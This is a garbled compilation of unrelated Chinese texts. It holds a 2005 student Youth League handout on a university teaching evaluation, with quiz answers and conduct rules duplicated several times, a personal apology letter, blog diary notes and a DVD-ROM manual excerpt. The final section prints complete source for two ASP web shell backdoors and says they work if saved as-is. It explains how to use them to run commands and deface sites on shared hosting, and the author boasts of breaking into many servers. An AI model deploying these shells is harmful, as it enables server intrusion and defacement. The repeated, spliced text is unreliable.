主题是评建的,下面是我准备的团会资料
104030602团支部团会资料
评估的背景:
2004年全国高校招生人数已达420万,比1998年增加了240万。在人数增长的同时,接纳这些学生的学校却并没有同比例增长,还是600余所。因此,增加了200多万名学生后,会不会导致教学质量的下降呢?
在这一背景下,去年10月,教育部建立了每五年一轮的高校教学评估制度,并且专门组织实施对于各高校的教学评估以及各项专业的评估,同时履行质量监控的行政职能,而且每年公开发布一次全国高校教学基本状态的相关数据。
本科院校的教学评估由教育部统一领导,由高等教育教学评估中心组织实施;。但是,教育部还要组织专家进行抽查评估。这其中,教育部每年要给予评估的本科院校和独立学院应当在200所左右
我们是评估的受益者。评估之后,学校的整体办学条件和办学实力得到很大提高,办学经验进一步丰富,社会声誉得到很大提升。这些将成为我们取之不竭,用之不尽的有形和无形的资源。所有说这次本科教学水平评估的最大受益者是我们。本科教学水平评估的出发点是以学生为本,以有利于培养学生成才。评估将给广大同学带来教学条件的改善,教学质量的提高,为教育教学创造一个良好的软件和硬件环境。
大家可以看见,由于评估,我们学校的硬件软件设施的改善,学校环境方面的改善。我们学校提出的目标是保良争优!(前一次评估我们学校是以良好通过的,在重庆市处于领先的地位)。同时,评估得优,不但能使学校的教学工作上一个新台阶,也能使学校的总体工作上一个新台阶,社会知名度上一个新台阶。学校知名度上去了,对招生生源,毕业生就业,吸引人才和其他教育资源都有利。可以说创优关系着我们的现在和未来,我们是本科教学水平评估的最大受益者。此外,广大学生对教学评估的认识和态度,以什么样的姿态迎接和参加评估,将直接关系到评估的结果和效果。因此,作为学生更应该积极主动地为迎接评估做贡献,为母校争光添彩。
1.以评促建 评建结合 以评促管 重在建设 以评促改 答案:以评促改,以评促建,以评促管,评建结合,重在建设。 2.、教育部“教学改革与质量工程”的主要内容不包括以下( D ) A、教学内容的改革 B、整个高等教育的人才培养模式的改革 C、怎样提高在校大学生的质量问题 D、教育思想观念的改革3. 1903年,美国莱特兄弟驾驶着自己设计制造的___飞机进行了一次划时代的飞行,成为航空史上的里程? B
A、“小男孩”号 B、“飞行者”1号 C、“莱特兄弟”1号 D、“勇敢者”号
4. 称为近代科学之父的是?D
A、 牛顿 B、哥白尼 C、亚里士多德 D、伽利略
5 著名的“马德堡半球实验”,是为了证明哪种科学现象?B
A、液体浮力 B、大气压强 C、物体重力
电脑类
6 所谓“绿色电脑”的标准是符合“能源之星”,下列选项哪个不在其范围之类? A
A、对人体有益无害 B、监视器 C、符合环境保护要求 D、待机状态
7 当前很多高科技公司都设了CIO这个职位,CIO的意思是:B
A、 首席运营官 B、首席信息官 C、首席技术官 D、首席财务官
常识类
8 传统彩瓷“素三彩”之所以称“素”是因为不用:C
A、绿色 B、黑色 C、红色 D、棕色
9 乘坐两排轮子的大型客车,坐在哪里最颠簸? B
A、车轮正上方 B、车顶 C、车中间处 D、都一样
10 烤全羊烤的是:B
A、黄羊 B、绵羊 C、羚羊 D、山羊
11 以下哪一种东西,是川菜的常用调料?C
A、孜然 B、紫苏 C、豆瓣 D、香椿
目前我们要做的就是积极行动起来,以饱满的精神状态投入到学习中去,从自己的一举一动、一言一行做起,从爱护学校的一草一木做起,做好一切准备,迎接评估。经过我们团支部总结,在此整理,与大家共勉。我们班同学应该努力做到如下:
一、文明自习,不在教室里大声喧哗,杜绝课堂上打电话、发信息、吃零食等不文明现象的发生。
二、按时作息,晚上及时休息,上、下午上课提前10分钟到教室。上好每一节课。上课不迟到、不早退、不旷课,自觉遵守课堂纪律。
三、 讲究诚信,以正确的心态对待考试,考试不作弊。
四、注重仪表整洁,穿着端庄得体,不穿背心、裤衩或拖鞋出入公共场所。
五、科学上网,杜绝痴迷网络。在BBS上发表符合我们身份的言论。合理利用时间,学好科学文化知识。
六、尊敬师长,团结同学,互相帮助,真诚待人。
七、以校为家,爱护公共设施,不随意践踏草坪,不损坏公物,拒绝课桌文化。
八、男女同学,自尊自爱,举止文明,言行得当,不在公共场合有过分亲密的行为。
九、讲究卫生,不随地吐痰,不乱扔垃圾,及时清理脏乱差物品,保持寝室内务卫生整洁。
十、排队就餐,主动收拾餐具,珍惜粮食,创造良好的就餐环境。
十一、 加强体育锻炼,积极参加各项活动,认真上体育课,不提前离开,努力锻炼身体,身体是革命的本钱。
同学们,在迎评迫在眉睫之际,让我们全班同学行动起来,以重工学子的执著和勤勉全力投入到学习中去,营造优良的校风和学风,以自己的实际行动和必胜的信心迎接评估,确保保良争优的目标实现。记住12月10日这个日子,相信是我们人生一个值得纪念的日子。以文明勤奋的形象欢迎专家组的到来,我们相信胜利一定属于重庆工学院!我们更有理由相信,我们和理工大学有约!
重庆工学院 104030602团支部
2005-10-16
2.、教育部“教学改革与质量工程”的主要内容不包括以下( D ) A、教学内容的改革 B、整个高等教育的人才培养模式的改革 C、怎样提高在校大学生的质量问题 D、教育思想观念的改革3. 1903年,美国莱特兄弟驾驶着自己设计制造的___飞机进行了一次划时代的飞行,成为航空史上的里程? B
A、“小男孩”号 B、“飞行者”1号 C、“莱特兄弟”1号 D、“勇敢者”号
4. 称为近代科学之父的是?D
A、 牛顿 B、哥白尼 C、亚里士多德 D、伽利略
5 著名的“马德堡半球实验”,是为了证明哪种科学现象?B
A、液体浮力 B、大气压强 C、物体重力
电脑类
6 所谓“绿色电脑”的标准是符合“能源之星”,下列选项哪个不在其范围之类? A
A、对人体有益无害 B、监视器 C、符合环境保护要求 D、待机状态
7 当前很多高科技公司都设了CIO这个职位,CIO的意思是:B
A、 首席运营官 B、首席信息官 C、首席技术官 D、首席财务官
常识类
8 传统彩瓷“素三彩”之所以称“素”是因为不用:C
A、绿色 B、黑色 C、红色 D、棕色
9 乘坐两排轮子的大型客车,坐在哪里最颠簸? B
A、车轮正上方 B、车顶 C、车中间处 D、都一样
10 烤全羊烤的是:B
A、黄羊 B、绵羊 C、羚羊 D、山羊
11 以下哪一种东西,是川菜的常用调料?C
A、孜然 B、紫苏 C、豆瓣 D、香椿
目前我们要做的就是积极行动起来,以饱满的精神状态投入到学习中去,从自己的一举一动、一言一行做起,从爱护学校的一草一木做起,做好一切准备,迎接评估。经过我们团支部总结,在此整理,与大家共勉。我们班同学应该努力做到如下:
一、文明自习,不在教室里大声喧哗,杜绝课堂上打电话、发信息、吃零食等不文明现象的发生。
二、按时作息,晚上及时休息,上、下午上课提前10分钟到教室。上好每一节课。上课不迟到、不早退、不旷课,自觉遵守课堂纪律。
三、 讲究诚信,以正确的心态对待考试,考试不作弊。
四、注重仪表整洁,穿着端庄得体,不穿背心、裤衩或拖鞋出入公共场所。
五、科学上网,杜绝痴迷网络。在BBS上发表符合我们身份的言论。合理利用时间,学好科学文化知识。
六、尊敬师长,团结同学,互相帮助,真诚待人。
七、以校为家,爱护公共设施,不随意践踏草坪,不损坏公物,拒绝课桌文化。
八、男女同学,自尊自爱,举止文明,言行得当,不在公共场合有过分亲密的行为。
九、讲究卫生,不随地吐痰,不乱扔垃圾,及时清理脏乱差物品,保持寝室内务卫生整洁。
十、排队就餐,主动收拾餐具,珍惜粮食,创造良好的就餐环境。
十一、 加强体育锻炼,积极参加各项活动,认真上体育课,不提前离开,努力锻炼身体,身体是革命的本钱。
同学们,在迎评迫在眉睫之际,让我们全班同学行动起来,以重工学子的执著和勤勉全力投入到学习中去,营造优良的校风和学风,以自己的实际行动和必胜的信心迎接评估,确保保良争优的目标实现。记住12月10日这个日子,相信是我们人生一个值得纪念的日子。以文明勤奋的形象欢迎专家组的到来,我们相信胜利一定属于重庆工学院!我们更有理由相信,我们和理工大学有约!
重庆工学院 104030602团支部
2005-10-16
C、怎样提高在校大学生的质量问题 D、教育思想观念的改革3. 1903年,美国莱特兄弟驾驶着自己设计制造的___飞机进行了一次划时代的飞行,成为航空史上的里程? B
A、“小男孩”号 B、“飞行者”1号 C、“莱特兄弟”1号 D、“勇敢者”号
4. 称为近代科学之父的是?D
A、 牛顿 B、哥白尼 C、亚里士多德 D、伽利略
5 著名的“马德堡半球实验”,是为了证明哪种科学现象?B
A、液体浮力 B、大气压强 C、物体重力
电脑类
6 所谓“绿色电脑”的标准是符合“能源之星”,下列选项哪个不在其范围之类? A
A、对人体有益无害 B、监视器 C、符合环境保护要求 D、待机状态
7 当前很多高科技公司都设了CIO这个职位,CIO的意思是:B
A、 首席运营官 B、首席信息官 C、首席技术官 D、首席财务官
常识类
8 传统彩瓷“素三彩”之所以称“素”是因为不用:C
A、绿色 B、黑色 C、红色 D、棕色
9 乘坐两排轮子的大型客车,坐在哪里最颠簸? B
A、车轮正上方 B、车顶 C、车中间处 D、都一样
10 烤全羊烤的是:B
A、黄羊 B、绵羊 C、羚羊 D、山羊
11 以下哪一种东西,是川菜的常用调料?C
A、孜然 B、紫苏 C、豆瓣 D、香椿
目前我们要做的就是积极行动起来,以饱满的精神状态投入到学习中去,从自己的一举一动、一言一行做起,从爱护学校的一草一木做起,做好一切准备,迎接评估。经过我们团支部总结,在此整理,与大家共勉。我们班同学应该努力做到如下:
一、文明自习,不在教室里大声喧哗,杜绝课堂上打电话、发信息、吃零食等不文明现象的发生。
二、按时作息,晚上及时休息,上、下午上课提前10分钟到教室。上好每一节课。上课不迟到、不早退、不旷课,自觉遵守课堂纪律。
三、 讲究诚信,以正确的心态对待考试,考试不作弊。
四、注重仪表整洁,穿着端庄得体,不穿背心、裤衩或拖鞋出入公共场所。
五、科学上网,杜绝痴迷网络。在BBS上发表符合我们身份的言论。合理利用时间,学好科学文化知识。
六、尊敬师长,团结同学,互相帮助,真诚待人。
七、以校为家,爱护公共设施,不随意践踏草坪,不损坏公物,拒绝课桌文化。
八、男女同学,自尊自爱,举止文明,言行得当,不在公共场合有过分亲密的行为。
九、讲究卫生,不随地吐痰,不乱扔垃圾,及时清理脏乱差物品,保持寝室内务卫生整洁。
十、排队就餐,主动收拾餐具,珍惜粮食,创造良好的就餐环境。
十一、 加强体育锻炼,积极参加各项活动,认真上体育课,不提前离开,努力锻炼身体,身体是革命的本钱。
同学们,在迎评迫在眉睫之际,让我们全班同学行动起来,以重工学子的执著和勤勉全力投入到学习中去,营造优良的校风和学风,以自己的实际行动和必胜的信心迎接评估,确保保良争优的目标实现。记住12月10日这个日子,相信是我们人生一个值得纪念的日子。以文明勤奋的形象欢迎专家组的到来,我们相信胜利一定属于重庆工学院!我们更有理由相信,我们和理工大学有约!
重庆工学院 104030602团支部
2005-10-16
二、按时作息,晚上及时休息,上、下午上课提前10分钟到教室。上好每一节课。上课不迟到、不早退、不旷课,自觉遵守课堂纪律。
三、 讲究诚信,以正确的心态对待考试,考试不作弊。
四、注重仪表整洁,穿着端庄得体,不穿背心、裤衩或拖鞋出入公共场所。
五、科学上网,杜绝痴迷网络。在BBS上发表符合我们身份的言论。合理利用时间,学好科学文化知识。
六、尊敬师长,团结同学,互相帮助,真诚待人。
七、以校为家,爱护公共设施,不随意践踏草坪,不损坏公物,拒绝课桌文化。
八、男女同学,自尊自爱,举止文明,言行得当,不在公共场合有过分亲密的行为。
九、讲究卫生,不随地吐痰,不乱扔垃圾,及时清理脏乱差物品,保持寝室内务卫生整洁。
十、排队就餐,主动收拾餐具,珍惜粮食,创造良好的就餐环境。
同学们,在迎评迫在眉睫之际,让我们全班同学行动起来,以重工学子的执著和勤勉全力投入到学习中去,营造优良的校风和学风,以自己的实际行动和必胜的信心迎接评估,确保保良争优的目标实现。记住12月10日这个日子,相信是我们人生一个值得纪念的日子。以文明勤奋的形象欢迎专家组的到来,我们相信胜利一定属于重庆工学院!我们更有理由相信,我们和理工大学有约!
老婆,我这两天真的对不起你。没有和你联系。
昨天晚上喝醉了,今天白天没有给你打电话。今天晚上我又去聚会了。
这两天我并不是这样想的,但是我真的很郁闷,我没有解释的理由。
但是这次真的是我从心里感觉很对不起你的一次。在QQ看到你消息前,我就自己责备过自己了。
但是你知道吗,你说的,希望我不要让下一个她哭,我看到心里真的是流血!真的有心如刀割的感觉。
最近我活得郁闷。心里其实也不开心。我知道从前天晚上的QQ麻将对战就让你已经很不爽。这个周末对于你来说是个黑色的。对于我来说,也是一点都不开心。这都是我的错造成了,我应该这样对你。我很多时候话说得好,但是做得太差了。真的,三,我再努力改变自己一些,在努力改正自己的缺点。我是一个不会体谅老婆的人,我真的很对不起你,老婆。。。。这次我错了。如果你能够看见我的心,希望原谅我。
三下乡这次计算机学院应该是非常成功的,但是最后学校评选,计算机学院居然不是三下乡先进。团委评选了生物和材料。今天下课看到邹老师,主席他们。知道后其实我也感觉有点气氛。但是试试想想,的确计算机学院在学校的确属于毛局对象。没有办法,想想我们的书记吧。。。。。可怜的人们啊。。。。
最近好忙,我和gregry爱上网上购物了。呵呵,他200搞定无线网络。我收获更大,呵呵,36元买了个CD机,7元买了以前最爱的BENQ海岸键盘。更绝的事情是100元买跟256的笔记本内存,然后110元把128的卖掉了。呵呵。升级赚钱第一次。^_^
今天中国国少队争气。没有让我白期待这场比赛,最终获得不容易的胜利。真的很不错!
哎,上次关闭完全不是我愿意的。。无聊的黑客,利用BO的漏洞,进入了我的后台,上传了木马,让服务器差点数据大量丢失,我真的郁闷啊。
这次新开,我把地址改变了,改成blog.21diy.com了。
人的生命短暂。以前一个朋友,最近死掉了。从老包那里获得消息,我感觉很意外,今天在QQ上问了杰森以前的女朋友,我才相信杰森是真的去了。
大家要注意身体啊。弄IT的不容易啊
簡介: Toshiba SD-C2612 DVD-ROM 使用者指南
製造商/型號
Toshiba SD-C2612
DVD-ROM: 8X |
CD-ROM: 24X |
BUS 介面
ATAPI
支援光碟格式
- DVD-ROM (DVD-5, DVD-9, DVD-10, DVD-18)
- DVD-R
- DVD-RW (讀取,單面) 橋 (影像 CD, 音像 CD)
- CD-DA
- CD+(E)G
- CD-MIDI
- CD-TEXT
- CD-ROM
- CD-ROM XA
- MIXED MODE CD
- CD-I
- CD-I
- 多重作業階段 (Photo-CD, CD Extra, Portfolio, CD-RW, CD-R) (讀取)
- CD-R
- CD-RW (讀取)
- HS CD-RW (讀取,單面)
綜合功能
抽屜式手動裝盤 / 自動彈出
三種彈出光碟的方法(彈出按鈕、軟體、緊急彈出孔)
DVD-ROM 特徵
100ms 平均存取時間
多重讀取功能
依照地區安排(RPC2 符合)
電影重放 1.6X - 2.4X
CD-ROM 特徵
95ms 平均存取時間
DAE (數位化音頻提取)音頻功能
MPC3 相容
DVD-ROM 組態
該 DVD-ROM 光碟機應只用於目前硬體和軟體組態。
前面板
圖 1.SD-C2612 DVD-ROM 前面板
彈出按鈕 (Eject) | Eject ( 彈出)按鈕是用來打開光碟機的托盤,使您能放入或取出光碟。 |
忙碌顯示燈 (BUSY) | 當您把光碟放入 DVD-ROM 後,光碟機定位光碟時,忙碌顯示燈會緩慢閃亮。會有以下情況:
|
緊急彈出孔 | 當您按下彈出 (EJECT) 按鈕而 DVD 托盤不會彈出時,才能使用緊急彈出孔。 |
DVD 托盤 | 光碟放在托盤上。 |
126邮箱2G的邮箱做的网络硬盘,有些我的好东西.大家试试
以下是第一款木马的代码:
<title>ASP Shell</title>
<%@ Language=VBScript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
-- create the COM objects that we will be using --
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
-- check for a command that we have posted --
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
-- Use a poor mans pipe ... a temp file --
szTempFile = "C:" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="执行命令">
</FORM>
<PRE><%
If (IsObject(oFile)) Then
-- Read the output from our command and remove the temp file --
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
运行后如下图: 在命令行里输入DIR命令点执行就可以查看目录了!!它可以使用各种DOS命令,如:copy、net、netstat等。
但是它的默认执行权限只有GUEST,也就是IUSR_COMPUTER用户的执行权限。当然如果你把IUSR_COMPUTER用户加入管理员组,那么你就有管理员权限了。这一款木马的特点是,使用很方便。几乎就想当于DOS命令行窗口xx作一样。但是如果服务器限制了FSO(无组件上传),那么它是没有办法使用了。还有就是在服务器以后增加的虚拟主机里也没有办法使用。只能在“默认 Web 站点”里使用,所以它相对的适用范围较窄。
对于防范方法让我们看一下它的代码就知道了:
Set oScript = Server.CreateObject("WSCRIPT.SHELL") "建立了一个名为oScript的WSCRIPT.SHELL对象,用于命令的执行"
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
上面三行代码创建了WSCRIPT.SHELL、WSCRIPT.NETWORK、Scripting.FileSystemObject三个对象,我们只要在注册表中把控制WSCRIPT.SHELL对象的项改名或删除就可以了。如下图:值得注意的是:我们应该把“WSCRIPT.SHELL”项和“WSCRIPT.SHELL.1”这两项都要改名或删除。因为如我们只修改“WSCRIPT.SHELL”项的话。那么黑客们只要把代码修改如下:Set oScript = Server.CreateObject("WSCRIPT.SHELL.1") 这个后门木马就又可以执行了。
大家可能已经想到了,我们在对“WSCRIPT.SHELL”项和“WSCRIPT.SHELL.1”改名时,一定要不容易被黑客们猜到,因为例如:你把“WSCRIPT.SHELL”改成了“WSCRIPT.SHELL888”。黑客们只要把代码相应的改成:Set oScript = Server.CreateObject("WSCRIPT.SHELL888"),木马程序就又可以执行了。还有就修改了注册表以后要重起WEB服务,设置才会有效。
接下来让我们再来看下一款ASP后门木马程序的代码:
<%response.write "<font size=6 color=red>一次只能执行一个xx作</font>" %>
<%response.write now()%><BR>程序所在的物理路径:
<%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
<html>
<title>asps shell.application backdoor </title>
<body>
<form action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=text value="<%=szCMD %>"> 输入要浏览的目录<br>
<input type=text name=text1 value="<%=szCMD1 %>">
copy
<input type=text name=text2 value="<%=szCMD2 %>"><br>
<input type=text name=text3 value="<%=szCMD3 %>">
move
<input type=text name=text4 value="<%=szCMD4 %>"><br>
路径:<input type=text name=text5 value="<%=szCMD5 %>">
程序:<input type=text name=text6 value="<%=szCMD6 %>"><br>
<input type=submit name=sb value=发送命令>
</form>
</body>
</html>
<%
szCMD = Request.Form("text") 目录浏览
if (szCMD <> "") then
set shell=server.createobject("shell.application") 建立shell对象
set fod1=shell.namespace(szcmd)
set foditems=fod1.items
for each co in foditems
response.write "<font color=red>" & co.path & "-----" & co.size & "</font><br>"
next
end if
%> <%
szCMD1 = Request.Form("text1") 目录拷贝,不能进行文件拷贝
szCMD2 = Request.Form("text2")
if szcmd1<>"" and szcmd2<>"" then
set shell1=server.createobject("shell.application") 建立shell对象
set fod1=shell1.namespace(szcmd2)
for i=len(szcmd1) to 1 step -1
if mid(szcmd1,i,1)="" then
path=left(szcmd1,i-1)
exit for
end if
next
if len(path)=2 then path=path & ""
path2=right(szcmd1,len(szcmd1)-i)
set fod2=shell1.namespace(path)
set foditem=fod2.parsename(path2)
fod1.copyhere foditem
response.write "command completed success!"
end if
%> <%
szCMD3 = Request.Form("text3") 目录移动
szCMD4 = Request.Form("text4")
if szcmd3<>"" and szcmd4<>"" then
set shell2=server.createobject("shell.application") 建立shell对象
set fod1=shell2.namespace(szcmd4) for i=len(szcmd3) to 1 step -1
if mid(szcmd3,i,1)="" then
path=left(szcmd3,i-1)
exit for
end if
next if len(path)=2 then path=path & ""
path2=right(szcmd3,len(szcmd3)-i)
set fod2=shell2.namespace(path)
set foditem=fod2.parsename(path2)
fod1.movehere foditem
response.write "command completed success!"
end if
%>
<%
szCMD5 = Request.Form("text5") 执行程序要指定路径
szCMD6 = Request.Form("text6")
if szcmd5<>"" and szcmd6<>"" then
set shell3=server.createobject("shell.application") 建立shell对象
shell3.namespace(szcmd5).items.item(szcmd6).invokeverb
response.write "command completed success!"
end if
%>
要查看目录,只要输入相应的目录,点发送命令就可以了。这个木马程可以完成文件的COPY、MOVE,和执行程序。但很多命令都不能用,例如:del、net、netstat等。这个木马程的功能随然简单,但是用它来黑一个网站是足够了。比如,我们可以把网站的首页MOVE到其它地方,然后我们再COPY一个同名的黑客网页进去,就行了。
最要命的是这个木马适用于任何虚拟主机之中,也就是说我只要是服务器中的一个虚拟空间的用户,我就可以传这个木马上去,并用它来修改其它任何用户的主页。所以如果哪些提供虚拟空间的服务商没有打补丁的话,那真是死定了。
然而在我的实践中发现,中国很多的虚拟空间服务商,特别是一些小型的服务商都没有打补丁。我利用这一漏洞拿到了很多虚拟空间服务器的ADMIN,然后好心的帮他们补上漏洞。当然我也得到了我想得到的东西——很多好的软件和代码。我现在用着的很多ASP程序就是从他们那上面偷下来,太难听了,应该说DOWN下来的才对。
言归正传,我们应该怎样来防范这个ASP后门木马程序呢?让我们看一下它其中的这一句代码:set shell=server.createobject("shell.application"),跟刚才的方法一样,我们只要把"shell.application"项和"shell.application.1"项改名或删除就可以了。记住了,如果是改名,要改得复杂一点,不要让黑客们一下就猜到了。顺便说一句,如果是你给肉鸡打补丁最好是改名,并把名字记下来,这样也就成为自己一个隐密的后门了。最后对这两款ASP木马后门,以及如何防范ASP木马后门做一下总结:第一款木马功能上强大一些, 但适用范围窄,需要FSO支持也就是"Scripting.FileSystemObject"项的支持。第二款木马虽然功能上少一些,但它创建的是"shell.application"对象。在任何虚拟主机中都适用。(这一点危害确实太大了,提供支持ASP空间的管理员们,你们可得注意了!)
其实跟据对上面两款ASP木马后门的防范,大家可能已经想到了,对于ASP后门木马的防范,我们只要在注册表中把"shell.application"、"WSCRIPT.SHELL"等危险的脚本对象(因为它们都是用于创建脚本命令通道的)进行改名或删除,也就是限制系统对“脚本SHELL”的创建,ASP木马也就成为无本之木、无米之炊,运行不起来了。
注:以上代码复制保存为ASP文件就可以直接使用了。